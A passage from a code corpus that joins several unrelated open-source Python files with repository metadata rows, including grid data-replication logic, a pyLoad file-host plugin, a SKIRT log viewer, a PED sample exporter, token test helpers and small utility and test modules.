self.log.error('Failed to check replicas', checkReplicas["Message"])
if hasattr(self, "FTSMode") and getattr(self, "FTSMode"):
bannedGroups = getattr(self, "FTSBannedGroups") if hasattr(self, "FTSBannedGroups") else ()
if self.request.OwnerGroup in bannedGroups:
self.log.verbose("usage of FTS system is banned for request's owner")
return self.dmTransfer()
if getattr(self, 'UseNewFTS3', False):
return self.fts3Transfer()
else:
return self.ftsTransfer()
return self.dmTransfer()
def __checkReplicas(self):
""" check done replicas and update file states """
waitingFiles = dict([(opFile.LFN, opFile) for opFile in self.operation
if opFile.Status in ("Waiting", "Scheduled")])
targetSESet = set(self.operation.targetSEList)
replicas = self.fc.getReplicas(waitingFiles.keys())
if not replicas["OK"]:
self.log.error('Failed to get replicas', replicas["Message"])
return replicas
reMissing = re.compile(r".*such file.*")
for failedLFN, errStr in replicas["Value"]["Failed"].iteritems():
waitingFiles[failedLFN].Error = errStr
if reMissing.search(errStr.lower()):
self.log.error("File does not exists", failedLFN)
gMonitor.addMark("ReplicateFail", len(targetSESet))
waitingFiles[failedLFN].Status = "Failed"
for successfulLFN, reps in replicas["Value"]["Successful"].iteritems():
if targetSESet.issubset(set(reps)):
self.log.info("file %s has been replicated to all targets" % successfulLFN)
waitingFiles[successfulLFN].Status = "Done"
return S_OK()
def _addMetadataToFiles(self, toSchedule):
""" Add metadata to those files that need to be scheduled through FTS
toSchedule is a dictionary:
{'lfn1': opFile, 'lfn2': opFile}
"""
if toSchedule:
self.log.info("found %s files to schedule, getting metadata from FC" % len(toSchedule))
else:
self.log.verbose("No files to schedule")
return S_OK([])
res = self.fc.getFileMetadata(toSchedule.keys())
if not res['OK']:
return res
else:
if res['Value']['Failed']:
self.log.warn("Can't schedule %d files: problems getting the metadata: %s" %
(len(res['Value']['Failed']), ', '.join(res['Value']['Failed'])))
metadata = res['Value']['Successful']
filesToSchedule = {}
for lfn, lfnMetadata in metadata.iteritems():
opFileToSchedule = toSchedule[lfn][0]
opFileToSchedule.GUID = lfnMetadata['GUID']
# In principle this is defined already in filterReplicas()
if not opFileToSchedule.Checksum:
opFileToSchedule.Checksum = metadata[lfn]['Checksum']
opFileToSchedule.ChecksumType = metadata[lfn]['ChecksumType']
opFileToSchedule.Size = metadata[lfn]['Size']
filesToSchedule[opFileToSchedule.LFN] = opFileToSchedule
return S_OK(filesToSchedule)
def _filterReplicas(self, opFile):
""" filter out banned/invalid source SEs """
return filterReplicas(opFile, logger=self.log, dataManager=self.dm)
def ftsTransfer(self):
""" replicate and register using FTS """
self.log.info("scheduling files in FTS...")
bannedTargets = self.checkSEsRSS()
if not bannedTargets['OK']:
gMonitor.addMark("FTSScheduleAtt")
gMonitor.addMark("FTSScheduleFail")
return bannedTargets
if bannedTargets['Value']:
return S_OK("%s targets are banned for writing" % ",".join(bannedTargets['Value']))
# Can continue now
self.log.verbose("No targets banned for writing")
toSchedule = {}
delayExecution = 0
errors = defaultdict(int)
for opFile in self.getWaitingFilesList():
opFile.Error = ''
gMonitor.addMark("FTSScheduleAtt")
# # check replicas
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
continue
replicas = replicas["Value"]
validReplicas = replicas.get("Valid")
noMetaReplicas = replicas.get("NoMetadata")
noReplicas = replicas.get('NoReplicas')
badReplicas = replicas.get('Bad')
noActiveReplicas = replicas.get('NoActiveReplicas')
if validReplicas:
validTargets = list(set(self.operation.targetSEList) - set(validReplicas))
if not validTargets:
self.log.info("file %s is already present at all targets" % opFile.LFN)
opFile.Status = "Done"
else:
toSchedule[opFile.LFN] = [opFile, validReplicas, validTargets]
else:
gMonitor.addMark("FTSScheduleFail")
if noMetaReplicas:
err = "Couldn't get metadata"
errors[err] += 1
self.log.verbose(
"unable to schedule '%s', %s at %s" %
(opFile.LFN, err, ','.join(noMetaReplicas)))
opFile.Error = err
elif noReplicas:
err = "File doesn't exist"
errors[err] += 1
self.log.error("Unable to schedule transfer",
"%s %s at %s" % (opFile.LFN, err, ','.join(noReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif badReplicas:
err = "All replicas have a bad checksum"
errors[err] += 1
self.log.error("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(badReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif noActiveReplicas:
err = "No active replica found"
errors[err] += 1
self.log.verbose("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(noActiveReplicas)))
opFile.Error = err
# All source SEs are banned, delay execution by 1 hour
delayExecution = 60
if delayExecution:
self.log.info("Delay execution of the request by %d minutes" % delayExecution)
self.request.delayNextExecution(delayExecution)
# Log error counts
for error, count in errors.iteritems():
self.log.error(error, 'for %d files' % count)
filesToScheduleList = []
res = self._addMetadataToFiles(toSchedule)
if not res['OK']:
return res
else:
filesToSchedule = res['Value']
for lfn in filesToSchedule:
filesToScheduleList.append((filesToSchedule[lfn][0].toJSON()['Value'],
toSchedule[lfn][1],
toSchedule[lfn][2]))
if filesToScheduleList:
ftsSchedule = FTSClient().ftsSchedule(self.request.RequestID,
self.operation.OperationID,
filesToScheduleList)
if not ftsSchedule["OK"]:
self.log.error("Completely failed to schedule to FTS:", ftsSchedule["Message"])
return ftsSchedule
# might have nothing to schedule
ftsSchedule = ftsSchedule["Value"]
if not ftsSchedule:
return S_OK()
self.log.info("%d files have been scheduled to FTS" % len(ftsSchedule['Successful']))
for opFile in self.operation:
fileID = opFile.FileID
if fileID in ftsSchedule["Successful"]:
gMonitor.addMark("FTSScheduleOK", 1)
opFile.Status = "Scheduled"
self.log.debug("%s has been scheduled for FTS" % opFile.LFN)
elif fileID in ftsSchedule["Failed"]:
gMonitor.addMark("FTSScheduleFail", 1)
opFile.Error = ftsSchedule["Failed"][fileID]
if 'sourceSURL equals to targetSURL' in opFile.Error:
# In this case there is no need to continue
opFile.Status = 'Failed'
self.log.warn("unable to schedule %s for FTS: %s" % (opFile.LFN, opFile.Error))
else:
self.log.info("No files to schedule after metadata checks")
# Just in case some transfers could not be scheduled, try them with RM
return self.dmTransfer(fromFTS=True)
def _checkExistingFTS3Operations(self):
"""
Check if there are ongoing FTS3Operation for the current RMS Operation
Under some conditions, we can be trying to schedule files while
there is still an FTS transfer going on. This typically happens
when the REA hangs. To prevent further race condition, we check
if there are FTS3Operations in a non Final state matching the
current operation ID. If so, we put the corresponding files in
scheduled mode. We will then wait till the FTS3 Operation performs
the callback
:returns: S_OK with True if we can go on, False if we should stop the processing
"""
res = FTS3Client().getOperationsFromRMSOpID(self.operation.OperationID)
if not res['OK']:
self.log.debug(
"Could not get FTS3Operations matching OperationID",
self.operation.OperationID)
return res
existingFTSOperations = res['Value']
# It is ok to have FTS Operations in a final state, so we
# care only about the others
unfinishedFTSOperations = [
ops for ops in existingFTSOperations if ops.status not in FTS3TransferOperation.FINAL_STATES]
if not unfinishedFTSOperations:
self.log.debug("No ongoing FTS3Operations, all good")
return S_OK(True)
self.log.warn("Some FTS3Operations already exist for the RMS Operation:",
[op.operationID for op in unfinishedFTSOperations])
# This would really be a screwed up situation !
if len(unfinishedFTSOperations) > 1:
self.log.warn("That's a serious problem !!")
# We take the rmsFileID of the files in the Operations,
# find the corresponding File object, and set them scheduled
rmsFileIDsToSetScheduled = set(
[ftsFile.rmsFileID for ftsOp in unfinishedFTSOperations for ftsFile in ftsOp.ftsFiles])
for opFile in self.operation:
# If it is in the DB, it has a FileID
opFileID = opFile.FileID
if opFileID in rmsFileIDsToSetScheduled:
self.log.warn("Setting RMSFile as already scheduled", opFileID)
opFile.Status = "Scheduled"
# We return here such that the Request is set back to Scheduled in the DB
# With no further modification
return S_OK(False)
def fts3Transfer(self):
""" replicate and register using FTS3 """
self.log.info("scheduling files in FTS3...")
# Check first if we do not have ongoing transfers
res = self._checkExistingFTS3Operations()
if not res['OK']:
return res
# if res['Value'] is False
# it means that there are ongoing transfers
# and we should stop here
if res['Value'] is False:
# return S_OK such that the request is put back
return S_OK()
fts3Files = []
toSchedule = {}
# Dict which maps the FileID to the object
rmsFilesIds = {}
for opFile in self.getWaitingFilesList():
rmsFilesIds[opFile.FileID] = opFile
opFile.Error = ''
gMonitor.addMark("FTSScheduleAtt")
# # check replicas
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
continue
replicas = replicas["Value"]
validReplicas = replicas["Valid"]
noMetaReplicas = replicas["NoMetadata"]
noReplicas = replicas['NoReplicas']
badReplicas = replicas['Bad']
noPFN = replicas['NoPFN']
if validReplicas:
validTargets = list(set(self.operation.targetSEList) - set(validReplicas))
if not validTargets:
self.log.info("file %s is already present at all targets" % opFile.LFN)
opFile.Status = "Done"
else:
toSchedule[opFile.LFN] = [opFile, validTargets]
else:
gMonitor.addMark("FTSScheduleFail")
if noMetaReplicas:
self.log.warn("unable to schedule '%s', couldn't get metadata at %s" % (opFile.LFN, ','.join(noMetaReplicas)))
opFile.Error = "Couldn't get metadata"
elif noReplicas:
self.log.error(
"Unable to schedule transfer", "File %s doesn't exist at %s" %
(opFile.LFN, ','.join(noReplicas)))
opFile.Error = 'No replicas found'
opFile.Status = 'Failed'
elif badReplicas:
self.log.error(
"Unable to schedule transfer",
"File %s, all replicas have a bad checksum at %s" %
(opFile.LFN,
','.join(badReplicas)))
opFile.Error = 'All replicas have a bad checksum'
opFile.Status = 'Failed'
elif noPFN:
self.log.warn(
"unable to schedule %s, could not get a PFN at %s" %
(opFile.LFN, ','.join(noPFN)))
res = self._addMetadataToFiles(toSchedule)
if not res['OK']:
return res
else:
filesToSchedule = res['Value']
for lfn in filesToSchedule:
opFile = filesToSchedule[lfn]
validTargets = toSchedule[lfn][1]
for targetSE in validTargets:
ftsFile = FTS3File.fromRMSFile(opFile, targetSE)
fts3Files.append(ftsFile)
if fts3Files:
res = Registry.getUsernameForDN(self.request.OwnerDN)
if not res['OK']:
self.log.error(
"Cannot get username for DN", "%s %s" %
(self.request.OwnerDN, res['Message']))
return res
username = res['Value']
fts3Operation = FTS3TransferOperation.fromRMSObjects(self.request, self.operation, username)
fts3Operation.ftsFiles = fts3Files
ftsSchedule = FTS3Client().persistOperation(fts3Operation)
if not ftsSchedule["OK"]:
self.log.error("Completely failed to schedule to FTS3:", ftsSchedule["Message"])
return ftsSchedule
# might have nothing to schedule
ftsSchedule = ftsSchedule["Value"]
self.log.info("Scheduled with FTS3Operation id %s" % ftsSchedule)
self.log.info("%d files have been scheduled to FTS3" % len(fts3Files))
for ftsFile in fts3Files:
opFile = rmsFilesIds[ftsFile.rmsFileID]
gMonitor.addMark("FTSScheduleOK", 1)
opFile.Status = "Scheduled"
self.log.debug("%s has been scheduled for FTS" % opFile.LFN)
else:
self.log.info("No files to schedule after metadata checks")
# Just in case some transfers could not be scheduled, try them with RM
return self.dmTransfer(fromFTS=True)
def dmTransfer(self, fromFTS=False):
""" replicate and register using dataManager """
# # get waiting files. If none just return
# # source SE
sourceSE = self.operation.SourceSE if self.operation.SourceSE else None
if sourceSE:
# # check source se for read
bannedSource = self.checkSEsRSS(sourceSE, 'ReadAccess')
if not bannedSource["OK"]:
gMonitor.addMark("ReplicateAndRegisterAtt", len(self.operation))
gMonitor.addMark("ReplicateFail", len(self.operation))
return bannedSource
if bannedSource["Value"]:
self.operation.Error = "SourceSE %s is banned for reading" % sourceSE
self.log.info(self.operation.Error)
return S_OK(self.operation.Error)
# # check targetSEs for write
bannedTargets = self.checkSEsRSS()
if not bannedTargets['OK']:
gMonitor.addMark("ReplicateAndRegisterAtt", len(self.operation))
gMonitor.addMark("ReplicateFail", len(self.operation))
return bannedTargets
if bannedTargets['Value']:
self.operation.Error = "%s targets are banned for writing" % ",".join(bannedTargets['Value'])
return S_OK(self.operation.Error)
# Can continue now
self.log.verbose("No targets banned for writing")
waitingFiles = self.getWaitingFilesList()
if not waitingFiles:
return S_OK()
# # loop over files
if fromFTS:
self.log.info("Trying transfer using replica manager as FTS failed")
else:
self.log.info("Transferring files using Data manager...")
errors = defaultdict(int)
delayExecution = 0
for opFile in waitingFiles:
if opFile.Error in ("Couldn't get metadata",
"File doesn't exist",
'No active replica found',
"All replicas have a bad checksum",):
err = "File already in error status"
errors[err] += 1
gMonitor.addMark("ReplicateAndRegisterAtt", 1)
opFile.Error = ''
lfn = opFile.LFN
# Check if replica is at the specified source
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
self.log.error('Failed to check replicas', replicas["Message"])
continue
replicas = replicas["Value"]
validReplicas = replicas.get("Valid")
noMetaReplicas = replicas.get("NoMetadata")
noReplicas = replicas.get('NoReplicas')
badReplicas = replicas.get('Bad')
noActiveReplicas = replicas.get('NoActiveReplicas')
if not validReplicas:
gMonitor.addMark("ReplicateFail")
if noMetaReplicas:
err = "Couldn't get metadata"
errors[err] += 1
self.log.verbose(
"unable to replicate '%s', couldn't get metadata at %s" %
(opFile.LFN, ','.join(noMetaReplicas)))
opFile.Error = err
elif noReplicas:
err = "File doesn't exist"
errors[err] += 1
self.log.verbose(
"Unable to replicate", "File %s doesn't exist at %s" %
(opFile.LFN, ','.join(noReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif badReplicas:
err = "All replicas have a bad checksum"
errors[err] += 1
self.log.error(
"Unable to replicate", "%s, all replicas have a bad checksum at %s" %
(opFile.LFN, ','.join(badReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif noActiveReplicas:
err = "No active replica found"
errors[err] += 1
self.log.verbose("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(noActiveReplicas)))
opFile.Error = err
# All source SEs are banned, delay execution by 1 hour
delayExecution = 60
continue
# # get the first one in the list
if sourceSE not in validReplicas:
if sourceSE:
err = "File not at specified source"
errors[err] += 1
self.log.warn(
"%s is not at specified sourceSE %s, changed to %s" %
(lfn, sourceSE, validReplicas[0]))
sourceSE = validReplicas[0]
# # loop over targetSE
catalogs = self.operation.Catalog
if catalogs:
catalogs = [cat.strip() for cat in catalogs.split(',')]
for targetSE in self.operation.targetSEList:
# # call DataManager
if targetSE in validReplicas:
self.log.warn("Request to replicate %s to an existing location: %s" % (lfn, targetSE))
opFile.Status = 'Done'
continue
res = self.dm.replicateAndRegister(lfn, targetSE, sourceSE=sourceSE, catalog=catalogs)
if res["OK"]:
if lfn in res["Value"]["Successful"]:
if "replicate" in res["Value"]["Successful"][lfn]:
repTime = res["Value"]["Successful"][lfn]["replicate"]
prString = "file %s replicated at %s in %s s." % (lfn, targetSE, repTime)
gMonitor.addMark("ReplicateOK", 1)
if "register" in res["Value"]["Successful"][lfn]:
gMonitor.addMark("RegisterOK", 1)
regTime = res["Value"]["Successful"][lfn]["register"]
prString += ' and registered in %s s.' % regTime
self.log.info(prString)
else:
gMonitor.addMark("RegisterFail", 1)
prString += " but failed to register"
self.log.warn(prString)
opFile.Error = "Failed to register"
# # add register replica operation
registerOperation = self.getRegisterOperation(
opFile, targetSE, type='RegisterReplica')
self.request.insertAfter(registerOperation, self.operation)
else:
self.log.error("Failed to replicate", "%s to %s" % (lfn, targetSE))
gMonitor.addMark("ReplicateFail", 1)
opFile.Error = "Failed to replicate"
else:
gMonitor.addMark("ReplicateFail", 1)
reason = res["Value"]["Failed"][lfn]
self.log.error(
"Failed to replicate and register", "File %s at %s:" %
(lfn, targetSE), reason)
opFile.Error = reason
else:
gMonitor.addMark("ReplicateFail", 1)
opFile.Error = "DataManager error: %s" % res["Message"]
self.log.error("DataManager error", res["Message"])
if not opFile.Error:
if len(self.operation.targetSEList) > 1:
self.log.info("file %s has been replicated to all targetSEs" % lfn)
opFile.Status = "Done"
# Log error counts
if delayExecution:
self.log.info("Delay execution of the request by %d minutes" % delayExecution)
self.request.delayNextExecution(delayExecution)
for error, count in errors.iteritems():
self.log.error(error, 'for %d files' % count)
return S_OK()
| gpl-3.0 | 803,170,856,147,399,300 | 37.025066 | 120 | 0.628526 | false |
fener06/pyload | module/plugins/hoster/EuroshareEu.py | 1 | 2302 | # -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: zoidberg
"""
import re
from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo
class EuroshareEu(SimpleHoster):
__name__ = "EuroshareEu"
__type__ = "hoster"
__pattern__ = r"http://(\w*\.)?euroshare.(eu|sk|cz|hu|pl)/file/.*"
__version__ = "0.23"
__description__ = """Euroshare.eu"""
__author_name__ = ("zoidberg")
FILE_INFO_PATTERN = r'<span style="float: left;"><strong>(?P<N>.+?)</strong> \((?P<S>.+?)\)</span>'
FILE_OFFLINE_PATTERN = ur'<h2>S.bor sa nena.iel</h2>|Požadovaná stránka neexistuje!'
FREE_URL_PATTERN = r'<a href="(/file/\d+/[^/]*/download/)"><div class="downloadButton"'
ERR_PARDL_PATTERN = r'<h2>Prebieha s.ahovanie</h2>|<p>Naraz je z jednej IP adresy mo.n. s.ahova. iba jeden s.bor'
FILE_URL_REPLACEMENTS = [(r"(http://[^/]*\.)(sk|cz|hu|pl)/", r"\1eu/")]
def handlePremium(self):
self.download(self.pyfile.url.rstrip('/') + "/download/")
def handleFree(self):
if re.search(self.ERR_PARDL_PATTERN, self.html) is not None:
self.longWait(300, 12)
found = re.search(self.FREE_URL_PATTERN, self.html)
if found is None:
self.parseError("Parse error (URL)")
parsed_url = "http://euroshare.eu%s" % found.group(1)
self.logDebug("URL", parsed_url)
self.download(parsed_url, disposition=True)
check = self.checkDownload({"multi_dl": re.compile(self.ERR_PARDL_PATTERN)})
if check == "multi_dl":
self.longWait(300, 12)
getInfo = create_getInfo(EuroshareEu) | gpl-3.0 | 7,234,009,282,891,823,000 | 40.071429 | 117 | 0.629839 | false |
SKIRT/PTS | do/core/show_simulation_log.py | 1 | 2931 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.do.core.show_simulation_log Show the log output of a remote SKIRT simulation.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from pts.core.basics.configuration import ConfigurationDefinition, parse_arguments
from pts.core.remote.host import find_host_ids
from pts.core.tools import filesystem as fs
from pts.core.remote.remote import Remote
from pts.core.simulation.remote import get_simulation_for_host, get_simulation_id
# -----------------------------------------------------------------
# Create the configuration definition
definition = ConfigurationDefinition()
# Add required
definition.add_required("remote", "string", "name of the remote host", choices=find_host_ids())
definition.add_positional_optional("id", "positive_integer", "simulation ID")
definition.add_optional("name", "string", "simulation name")
# -----------------------------------------------------------------
# Parse the arguments into a configuration
config = parse_arguments("show_simulation_log", definition, description="Show the log output of a remote SKIRT simulation")
# -----------------------------------------------------------------
# Determine simulation ID
if config.name is not None:
if config.id is not None: raise ValueError("Cannot specifiy both name and simulation ID")
simulation_id = get_simulation_id(config.remote, config.name)
else: simulation_id = config.id
# -----------------------------------------------------------------
# Open the simulation
simulation = get_simulation_for_host(config.remote, simulation_id)
# The name of the ski file (the simulation prefix)
ski_name = simulation.prefix()
# Simulation is retrieved
if simulation.retrieved:
# Determine the path to the simulation log file
local_log_file_path = simulation.log_file_path
# Read the log file
lines = fs.read_lines(local_log_file_path)
# Not yet retrieved
else:
# The path to the simulation log file
remote_log_file_path = simulation.remote_log_file_path
# Create and setup the remote
remote = Remote()
remote.setup(config.remote)
# Check whether the log file exists
if not remote.is_file(remote_log_file_path): raise RuntimeError("The log file does not (yet) exist remotely")
# Read the log file
lines = remote.read_lines(remote_log_file_path)
# Print the lines of the log file
for line in lines: print(line)
# -----------------------------------------------------------------
| agpl-3.0 | 2,216,039,816,062,871,300 | 35.17284 | 123 | 0.601024 | false |
labsquare/CuteVariant | cutevariant/core/writer/pedwriter.py | 1 | 2889 | import csv
from .abstractwriter import AbstractWriter
from cutevariant.core.sql import get_samples
class PedWriter(AbstractWriter):
"""Writer allowing to export samples of a project into a PED/PLINK file.
Attributes:
device: a file object typically returned by open("w")
Example:
>>> with open(filename,"rw") as file:
... writer = MyWriter(file)
... writer.save(conn)
"""
def __init__(self, device):
super().__init__(device)
def save(self, conn, delimiter="\t", **kwargs):
r"""Dump samples into a tabular file
Notes:
File is written without header.
Example of line::
`family_id\tindividual_id\tfather_id\tmother_id\tsex\tphenotype`
Args:
conn (sqlite.connection): sqlite connection
delimiter (str, optional): Delimiter char used in exported file;
(default: ``\t``).
**kwargs (dict, optional): Arguments can be given to override
individual formatting parameters in the current dialect.
"""
writer = csv.DictWriter(
self.device,
delimiter=delimiter,
lineterminator="\n",
fieldnames=[
"family_id",
"name",
"father_id",
"mother_id",
"sex",
"phenotype",
],
extrasaction="ignore",
**kwargs
)
g = list(get_samples(conn))
# Map DB ids with individual_ids
individual_ids_mapping = {sample["id"]: sample["name"] for sample in g}
# Add default value
individual_ids_mapping[0] = 0
# Replace DB ids
for sample in g:
sample["father_id"] = individual_ids_mapping[sample["father_id"]]
sample["mother_id"] = individual_ids_mapping[sample["mother_id"]]
writer.writerows(g)
def save_from_list(self, samples, delimiter="\t", **kwargs):
r"""Dump samples into a tabular file
Args:
samples(list): Iterable of samples; each sample is a list itself.
=> It's up to the user to give field in the correct order.
delimiter (str, optional): Delimiter char used in exported file;
(default: ``\t``).
**kwargs (dict, optional): Arguments can be given to override
individual formatting parameters in the current dialect.
Notes:
Replace None or empty strings to 0 (unknown PED ID)
"""
writer = csv.writer(
self.device, delimiter=delimiter, lineterminator="\n", **kwargs
)
# Replace None or empty strings to 0 (unknown PED ID)
clean_samples = ([item if item else 0 for item in sample] for sample in samples)
writer.writerows(clean_samples)
| gpl-3.0 | -2,977,546,047,046,953,000 | 32.988235 | 88 | 0.563171 | false |
Callek/build-relengapi | relengapi/blueprints/tokenauth/util.py | 1 | 2357 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
from itsdangerous import BadData
from relengapi.blueprints.tokenauth.tables import Token
from relengapi.lib.permissions import p
# test utilities
class FakeSerializer(object):
"""A token serializer that produces a readable serialization, for use in
tests."""
@staticmethod
def prm(id):
return FakeSerializer.dumps(
{"iss": "ra2", "jti": "t%d" % id, "typ": "prm"})
@staticmethod
def tmp(nbf, exp, prm, mta):
return FakeSerializer.dumps(
{"iss": "ra2", "typ": "tmp", 'nbf': nbf,
"exp": exp, "prm": prm, "mta": mta})
@staticmethod
def usr(id):
return FakeSerializer.dumps(
{"iss": "ra2", "jti": "t%d" % id, "typ": "usr"})
@staticmethod
def dumps(data):
return 'FK:' + json.dumps(data,
separators=(',', ':'),
sort_keys=True)
@staticmethod
def loads(data):
if data[:3] != 'FK:':
raise BadData('Not a fake token')
else:
return json.loads(data[3:])
# sample tokens, both a function to insert, and a JSON representation of the
# corresponding result.
def insert_prm(app):
session = app.db.session('relengapi')
t = Token(
id=1,
typ='prm',
disabled=False,
permissions=[p.test_tokenauth.zig],
description="Zig only")
session.add(t)
session.commit()
prm_json = {
'id': 1,
'typ': 'prm',
'description': 'Zig only',
'permissions': ['test_tokenauth.zig'],
'disabled': False,
}
def insert_usr(app, permissions=[p.test_tokenauth.zig], disabled=False):
session = app.db.session('relengapi')
t = Token(
id=2,
typ='usr',
user='[email protected]',
permissions=permissions,
disabled=disabled,
description="User Zig")
session.add(t)
session.commit()
usr_json = {
'id': 2,
'typ': 'usr',
'user': '[email protected]',
'description': 'User Zig',
'permissions': ['test_tokenauth.zig'],
'disabled': False,
}
def insert_all(app):
insert_prm(app)
insert_usr(app)
| mpl-2.0 | -2,998,231,699,835,763,000 | 23.05102 | 76 | 0.570216 | false |
russb78/RDuD2 | RDuD2/modules/helperfuncs.py | 1 | 1066 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# controlfuncs.py
#
# Copyright 2013 Russell Barnes
#
from nanpy import Arduino
def map(x, in_min, in_max, out_min, out_max):
"""
Arduino-style map function to take input min/max and apply to
output min/max.
"""
return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
def degrees(x): ### Tweak specifically for you own robot with testing ###
"""
x is the number of degrees you with the robot to spin on the spot.
0 == none - 259 == a full 360 degree spin. X is the Arduino.delay length
"""
return (x - 0) * (1021 - 0) / (359 - 0) + 0
def pan_angle(x):
"""
Pan servo range should be constrain between 0-149
(x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
"""
return (x - 0) * (149 - 0) / (179 - 0) + 0
def tilt_angle(x):
"""
Tilt servo range should be constrained between 50-179
(x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
"""
return (x - 0) * (179 - 50) / (179 - 0) + 50
| mit | 8,028,310,621,455,294,000 | 27.052632 | 76 | 0.567542 | false |
kubow/HAC | System/test.py | 1 | 3854 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import unittest
from log import Log
from DV72 import ControlDevice
from OS74 import CurrentPlatform, FileSystemObject
from MP74 import OpenWeatherMap
from TX74 import WebContent
def load_platform_based(from_path, web=None):
base = FileSystemObject().dir_up(2)
print(base)
if web:
return web + base + from_path
else:
return base + from_path
class DeviceSetting(unittest.TestCase):
"""Check if logging can process"""
def test_device_basic(self):
dev = ControlDevice()
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Device', 'test.py', False)
text = 'Checking device ({0}) setting: {1}'.format(dev.device_name, dev.setup_db)
logger.log_operation(text)
self.assertEquals(dev.interval_shift, 2)
class TestLocalContent(unittest.TestCase):
"""Check if local data accessible"""
def test_local_content(self):
location = FileSystemObject().dir_up(1)
fso = FileSystemObject(location)
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Folder', 'test.py', False)
text = 'Checking folder ({0}) manageable: {1}'.format(location, str(1))
logger.log_operation(text)
self.assertEqual(fso.path, 'C:\\_Run\\Script\\Multimedia')
class TestWeather(unittest.TestCase):
"""Check if weather data accessible"""
def test_weather(self):
loc = 'Horni Pocernice,cz' # 'Necin,cz'
try:
o = OpenWeatherMap(loc)
text = 'Checking weather at location ({0}) manageable: {1}'.format(loc, o.heading[0])
except:
text = 'Cannot properly get {0} data : {1}'.format(loc, str(None))
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Weather', 'test.py', False)
logger.log_operation(text)
self.assertIn(loc.split(',')[-1], o.heading[0])
def test_dummy_weather(self):
"""Check if can treat no submitted location"""
loc = '' # 'Necin,cz'
try:
o = OpenWeatherMap(loc)
text = 'Checking weather at location ({0}) manageable: {1}'.format(loc, o.heading[0])
except:
text = 'Cannot properly get {0} data : {1}'.format(loc, str(None))
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Weather', 'test.py', False)
logger.log_operation(text)
self.assertIn(loc.split(',')[-1], o.heading[0])
class TestWebContent(unittest.TestCase):
"""Check if web data (local/internet) accessible"""
def test_localhost_content(self):
try:
o = WebContent(load_platform_based('Web/index.html', 'file:///'))
o.process_url()
text = 'Checking Web Content of ({0}) : {1}'.format('index.html', o.url)
except:
text = 'Cannot properly get {0} from : {1}'.format('Web/index.html', o.url)
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Webfile', 'test.py', False)
logger.log_operation(text)
self.assertIn('encyklopedie', str(o.div))
def test_web_content(self):
try:
o = WebContent('https://aktualnizpravy.cz/')
o.process_url()
text = 'Check Web Content ({0}) : {1}'.format('index.html', o.url)
except:
text = 'Cannot properly get {0} from : {1}'.format('index.html', o.url)
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Webfile', 'test.py', False)
logger.log_operation(text)
self.assertIn('dnes m', str(o.div))
def test_rss_content(self):
try:
o = WebContent('http://www.root.cz/rss/clanky/', mode='rss')
except:
print('some bad happened')
self.assertIn('root.cz', o.div)
unittest.main()
| unlicense | -2,545,163,283,945,300,000 | 37.929293 | 103 | 0.608978 | false |
tcalmant/ipopo | pelix/shell/eventadmin.py | 1 | 2445 | #!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
EventAdmin shell commands
Provides commands to the Pelix shell to work with the EventAdmin service
:author: Thomas Calmant
:copyright: Copyright 2020, Thomas Calmant
:license: Apache License 2.0
:version: 1.0.1
..
Copyright 2020 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Shell constants
from pelix.shell import SERVICE_SHELL_COMMAND
# iPOPO Decorators
from pelix.ipopo.decorators import (
ComponentFactory,
Requires,
Provides,
Instantiate,
)
import pelix.services
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# -----------------------------------------------------------------------------
@ComponentFactory("eventadmin-shell-commands-factory")
@Requires("_events", pelix.services.SERVICE_EVENT_ADMIN)
@Provides(SERVICE_SHELL_COMMAND)
@Instantiate("eventadmin-shell-commands")
class EventAdminCommands(object):
"""
EventAdmin shell commands
"""
def __init__(self):
"""
Sets up members
"""
# Injected services
self._events = None
@staticmethod
def get_namespace():
"""
Retrieves the name space of this command handler
"""
return "event"
def get_methods(self):
"""
Retrieves the list of tuples (command, method) for this command handler
"""
return [("send", self.send), ("post", self.post)]
